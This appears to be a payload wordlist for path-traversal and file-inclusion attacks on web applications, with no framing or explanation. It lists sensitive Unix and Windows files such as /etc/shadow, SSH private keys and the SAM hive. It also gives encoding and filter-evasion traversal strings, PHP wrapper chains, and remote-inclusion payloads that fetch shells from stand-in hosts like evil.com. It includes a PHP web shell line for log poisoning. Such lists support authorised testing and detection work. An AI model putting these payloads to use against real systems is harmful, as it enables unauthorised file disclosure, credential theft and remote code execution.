/etc
\\
..
/var
/proc
/usr
C:\
# Sensitive Directories (Unix/Linux)
/etc/
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/ssh/
/etc/sudoers
/var/
/var/log/
/var/www/
/var/lib/
/proc/
/proc/self/
/proc/self/environ
/proc/self/cmdline
/proc/mounts
/usr/
/usr/bin/
/usr/sbin/
/usr/local/
/tmp/
/dev/
/dev/null
/dev/zero
/dev/random
/dev/tcp/
/dev/udp/
/home/
/root/
.bashrc
.bash_history
.ssh/
.ssh/authorized_keys
.ssh/id_rsa
.ssh/known_hosts
.htaccess
.htpasswd
# Sensitive Directories(Windows)
C:\Windows\
C:\Windows\System32\
C:\Windows\SysWOW64\
C:\Program Files\
C:\Program Files (x86)\
C:\Users\
C:\Users\Public\
C:\Documents and Settings\
C:\boot.ini
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\repair\SAM
C:\Windows\Panther\Unattend.xml
C:\Windows\debug\NetSetup.log
%WINDIR%
%SYSTEMROOT%
%APPDATA%
%PROGRAMDATA%
%TEMP%
%USERPROFILE%
# Path Traversal & Evasion Patterns
../
..\
..\/
..%2f
..%5c
%2e%2e%2f
%2e%2e%5c
....//
....\/
....%2f
....%5c
\.\./
\.\.\
\..\
/./
/../
/.../
C:\..\
\\?\
\\.\
UNC paths (\\server\share\)
file://
php://filter
zip://
phar://
data://
expect://
# Basic LFI Payloads
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
/../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2fetc%2fpasswd
# Null Byte Termination (PHP <5.3.4)
../../../etc/passwd%00
/etc/passwd%00
file=../../../../etc/passwd%00
# Double Encoding
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
# UTF-8 Encoding
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%aeetc%c0%aepasswd
# Path Truncation (Long filenames >4096 bytes)
../../../etc/passwd............[ADD MORE]
../../../etc/passwd/./././././.[ADD MORE]
../../../[ADD MORE]../../../../etc/passwd
# Filter Bypass Tricks
....//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
# Basic RFI Payloads
http://evil.com/shell.txt
http://attacker.com/exploit.php
\\10.0.0.1\share\shell.php
# RFI with Null Byte
http://evil.com/shell.txt%00
# RFI Double Encoding
http:%252f%252fevil.com%252fshell.txt
# PHP Wrappers (LFI to RCE/Data Leak)
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
pHp://FilTer/convert.base64-encode/resource=index.php
# Chained Wrappers (Complex Bypasses)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=/etc/passwd
# Log Poisoning (LFI to RCE)
/var/log/apache2/access.log
/var/log/auth.log
<?php system($_GET['cmd']); ?>
# SMB RFI (Windows)
# Common Sensitive Files (LFI Targets)
/var/www/html/config.php
/wp-config.php
# Web Root Files
index.php
config.inc.php
settings.ini
# Session Files (PHP)
/var/lib/php/sessions/sess_[SESSION_ID]
/tmp/sess_[SESSION_ID]
